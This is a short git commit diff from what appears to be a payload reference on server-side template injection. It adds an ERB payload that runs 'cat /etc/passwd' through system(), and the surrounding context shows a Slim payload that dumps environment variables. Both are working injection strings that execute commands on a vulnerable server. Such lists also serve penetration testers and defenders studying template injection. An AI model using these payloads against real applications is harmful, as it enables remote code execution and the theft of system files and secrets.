Adding Execute code using SSTI for ERB engine.

This commit is contained in:
idealphase 2020-04-30 17:13:58 +07:00 committed by GitHub
parent 04899355ad
commit 7f1fb32980
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -97,6 +97,12 @@ Execute code using SSTI for Slim engine.
#{ %x|env| }
```
Execute code using SSTI for ERB engine.
```ruby
<%= system('cat /etc/passwd') %>
```
## Java
### Basic injection